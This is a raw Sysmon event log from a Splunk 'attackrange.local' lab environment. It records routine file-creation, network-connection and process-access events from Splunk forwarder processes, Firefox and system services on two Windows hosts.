Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=B11E4901EE2009BC2E8D2D57BA2ED468,SHA256=9A416508A75CFB529892160F643B82E3F58DA753DA3E7530DD6582AA847450E8,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048018Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:35.250{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4FA2412384AD8FF79D3A05BFCEFBE025,SHA256=AB37EE798044B91E3499E607B6B6309217BDF3803E733BC2266E01914351F11D,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048020Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:27.728{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51001-false10.0.1.12-8000- 23542300x80000000000000001048019Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:36.265{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FA768C392A73D8B8D3ADDAE66F5FCECB,SHA256=624AB5A8B5F9159A04F13D10DCE3DF29A668C580B932063AF30AD9B35561FE3C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807283Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:36.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A9F18D152A7C0DFBC24C6F1D9D12DBB9,SHA256=09A52E1F18920CD11CB8FFEE905A9A4D9C1329927413A9FC463F49F135504B7F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048021Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:37.301{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=D6CE43B59473A3EC90BB4672EF41ADAE,SHA256=7743FEC5F1845FAE3BB8202A58AB102D308F10A2B35C61698BB98D1ED6517462,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807284Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:37.158{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E68EF49E56E3F7F868A09E39599E33A0,SHA256=401DD29908BF727FCA81306EB30BE9CF47C695D9DD19A9FD067744DFFB50EE97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807285Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:38.205{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ED2A260EAA887B28D25174EC239F6F6C,SHA256=013DB63302103E98888F79A7FA94E3A74EDAADED2BEF90DB3E034E9CA1517939,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048023Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.516{466BC892-02AF-60E8-1200-00000000CF01}400NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive1.datMD5=76484322985778F0D53DB2F6C5843CEE,SHA256=5FF565771C4A7564D2B8801853CD7EAA40EF7B381EB8A203BE0CB1006C496D97,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048022Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.316{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=60C4176EC0DB081FD75A58FD56867500,SHA256=6DAC06B6F82DA04A06CBC154129E9DE4B367D835DAC9D3CCB8E3B066DDE23DCB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807286Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:39.236{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F0527DB45881D032F07A20FEAC79E385,SHA256=301D4BA869B7CEF7BED33EAF571E90488F2300F666F86B24330481E9CEF8B9A4,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048035Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=3C08B78F04297E6F10B389E1CD4BB5A5,SHA256=0C9A4CD3A3D0299C9EAA0093D3E918DCB25121B91EB581E7F396B3859C65E842,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048034Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C859C64E71F69E86541B26132A502173,SHA256=D61DFDC717EEA0DAF090FE5DF2C3C9A2A63FB7853430C0A2D0B144953E879272,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048033Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=FFEBAA72DFE64CCD37D65CD0C6A0FF14,SHA256=9EAC8ED5DE6DCFD7F7D5A7A6B43E77D62FC4453F59933DEFB6DF781A8505E9A0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048032Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=53DE5A19EFC06FE1D1011B2A2215AFB0,SHA256=B079EEE3303A6F424104FD842A2A2CF9306A19E5D0E1B4FFB8CFCEF39A8DA6D2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048031Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=60A2BBDF3B77E5D844F49080356E7210,SHA256=A41AA8D02895E173ACEDA9F10FE2A511646DD368C7F07D32ADAD4488D2751059,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048030Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=C717FBC36A17CE6109CF01C3BF548FAA,SHA256=F23AB9A811F460C76957A393F7D3DB77B8A1DFE0419A11E77F8B291FAE9118EC,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048029Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.984{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=BD4A0470CCBC3D99EF9088216ABF5D06,SHA256=2DACBF0275EB2117AA29BA24A327767BF1E9F315E0EA0C93CD3A33F1982D47C3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048028Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.983{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DACA33C307A371BB0922FFC9339952E3,SHA256=BC5EC74605CFFC864B130C0F79FF91BF8B05BAB8BD4FEB8077185BF70149B24D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048027Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.981{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=DC524684E4FE5CF311F229293F8CBD4C,SHA256=5CF46EFAA9689148149610D9E92B84A122DCDD9B75981361E8F72D2C73F4A6BB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048026Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.980{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=912A3B4007D19B4CB4553DA2EAECF077,SHA256=31E83F5A04D712283B77FB96F486B62F14922EFF672C0E06E2AFC5BAC80E1474,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048025Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.979{466BC892-3462-60E8-100C-00000000CF01}8944ATTACKRANGE\bobC:\Program Files\Mozilla Firefox\firefox.exeC:\Users\bob\AppData\Roaming\Mozilla\Firefox\Profiles\bnjry9g4.default-release\datareporting\glean\db\data.safe.binMD5=2F339294D100CE6DB364C701CC1331AD,SHA256=DE1714E9BDCE6B1C53AC26D0A699AB0B32998E1A19A7C8FE7045452F8B0DEBDE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048024Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:39.331{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9A75462C3309FAB3E635DFDDE4370BB5,SHA256=76F92421945549A2C63A5A2114A9BD1C87B8929D410F78F92CAFC1C085866F35,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807287Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:40.283{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=48B07ABC750B5CB152BE6CB0B4CB71FC,SHA256=B52153426A35A2230E244ECD0331FDC1C9A6B3A754676CCC8FAEAEC545200D88,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048036Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:40.346{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=76217B0BBC4EC71567886BF4770BB9E1,SHA256=0EF28A1492A6C39580B079AF5DEF380C9CB4DE48A8951A746DDDC8E2E395F70B,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048038Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:33.645{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51002-false10.0.1.12-8000- 23542300x80000000000000001048037Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:41.361{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E9CB36DC6DA67327B090B520C50AD2EF,SHA256=DECBE67BEB0D5C03EE7C7D766292C4195913FCF5D646B93F94F36A42D568DA63,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807289Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:40.291{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57243-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807288Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:41.299{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=3F6968F68406D7D1128C5C09D4782E33,SHA256=30DE45ADC72138EEA9EDAE3BA09A7C8AA98159A2873AD92B12F7CD3E0FC2C62A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048039Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:42.362{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DDA0782E2843B07D941FA512C80CB201,SHA256=912308A9AEA9BC0F07A974229338DDBE2E7F83914EE8F3AEE5518424118A3DE5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807290Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:42.314{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9D835DD8A8BE765F2C4478E919A98579,SHA256=8A84653B0FF5F4024D8BEBF5321C1A50DC95C63002A4C9949BBC26536FAF33B7,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807291Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:43.346{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=607605943DAC1332BF89B00DEC7638C2,SHA256=4F12401938A1F55714B796832B2BFCF4AE9E46D00749F63E713CBB6E292A9CF3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048040Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:43.398{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=0BA6601D4D2D28BE4F2582870132AB1A,SHA256=8AEFACD1400E55C5F48CD1B475DE6851CE766970161355B87D7D4247F0BD3AA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807292Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:44.377{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9BB3B0266F603FACC6B2D085EE996094,SHA256=5E172C837045661FA76F9FBFE48D94EEEFB2A834F5DADB4694FBC0E7F9455F5D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048041Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:44.428{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=084D469E28FA57F3013CFC7C8BCC1CE4,SHA256=E1077DC1343EE9F6ACED6B369359AE4D22245C29146E8B8FAFAE876E4B1E55A2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048042Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:45.458{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F1CA50E1F5B7CE6AC1E12B51D8195A8F,SHA256=62D053B53C8CFEDD43028C981E65DBBD81EA01A8EEE434E3C36D6582385612B3,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807293Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:45.378{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32F1B9AB64B6E9FD94A07392064184E8,SHA256=2169E37BB52C99E3D6B85A9F89C55F0A867DB590149986069EC8D6D714362849,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000001048044Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:38.704{466BC892-02C7-60E8-6D00-00000000CF01}3524C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-890.attackrange.local51003-false10.0.1.12-8000- 23542300x80000000000000001048043Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:46.476{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=93DAA374986BE2F7703C77A6D45C2B40,SHA256=7B22C4DB6D67F143E136DFAF36D2F6EF4DF8866740DC03A4D01612ACAAD7023B,IMPHASH=00000000000000000000000000000000falsetrue 354300x8000000000000000807295Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:45.292{0C1E0330-0512-60E8-CA00-00000000D001}3600C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.15win-host-623.attackrange.local57244-false10.0.1.12ip-10-0-1-12.eu-central-1.compute.internal8000- 23542300x8000000000000000807294Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:46.390{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=6921172D00D295711BE7273FD5772480,SHA256=E95422BFEBECB08B8A3E3629348E21DB2D131DE04108110D74E159F7FE8260F9,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048045Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:47.494{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=4571F3312B00D45417BAFCED3837E9AA,SHA256=076F41011855B517CF737EF7562AF0EF62CEA1D4586E2DCC5C24AD32E146907D,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807296Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:47.392{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=32F1B7C61BCF92303D1290D3D38C4676,SHA256=B877DD3257EF1EF9F4383CF18C8A38B3DE2E211F93FF2FB86EBBA7637337B733,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807297Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:48.439{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=562D28F5DFC06DE63FD1E4BEE448DC00,SHA256=058E1BFB1DC946A95689D188C7BFC021A18BBAE26A0EC11EC46374EB55A03F5C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048046Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:48.508{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=970CFF58DE48BAF1A2CA8BA023B5C1B5,SHA256=90F4FAEFE143C40F3D41DF90D87B710D4E64962B93A9DE722DA8CCE7F44E9AEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807298Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:49.454{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=513A8A4663240CFB72FBF7C3FCDF37BC,SHA256=BC579085EE8B7863194599CE8D03BC4D908200BC9AE3F61464969AE8F27FE520,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000001048047Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:49.523{466BC892-02CE-60E8-7600-00000000CF01}3400NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=C13E665FDA7E4374621C6EFDD4078866,SHA256=BF042173F3CB6D509164C8E98B4B2F161E4229408057BCC91D98BABE5345CC60,IMPHASH=00000000000000000000000000000000falsetrue 23542300x8000000000000000807299Microsoft-Windows-Sysmon/Operationalwin-host-623.attackrange.local-2021-07-12 07:50:50.501{0C1E0330-0518-60E8-D300-00000000D001}380NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=092CF3B9831CA29D3F7054ACDD00D225,SHA256=5B965EED40B9D89224F5A52A018EA391141CD4A61100EC33DC77AEA39E1A4B61,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000001048065Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.923{466BC892-02BD-60E8-3500-00000000CF01}32483268C:\Windows\system32\conhost.exe{466BC892-F45A-60EB-1D7D-00000000CF01}9716C:\Program Files\SplunkUniversalForwarder\bin\splunk-netmon.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\SYSTEM32\ConhostV2.dll+5ca7|C:\Windows\SYSTEM32\ConhostV2.dll+774b|C:\Windows\SYSTEM32\ConhostV2.dll+a8ef|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048064Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 07:50:50.923{466BC892-02AF-60E8-0C00-00000000CF01}8449428C:\Windows\system32\svchost.exe{466BC892-02BC-60E8-2E00-00000000CF01}1152C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6134|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+7a593|C:\Windows\System32\RPCRT4.dll+d9f41|C:\Windows\System32\RPCRT4.dll+62d4c|C:\Windows\System32\RPCRT4.dll+4a274|C:\Windows\System32\RPCRT4.dll+4918d|C:\Windows\System32\RPCRT4.dll+49a3b|C:\Windows\System32\RPCRT4.dll+310ac|C:\Windows\System32\RPCRT4.dll+3152c|C:\Windows\System32\RPCRT4.dll+1ae1c|C:\Windows\System32\RPCRT4.dll+1c67b|C:\Windows\System32\RPCRT4.dll+43a2a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51781 10341000x80000000000000001048063Microsoft-Windows-Sysmon/Operationalwin-dc-890.attackrange.local-2021-07-12 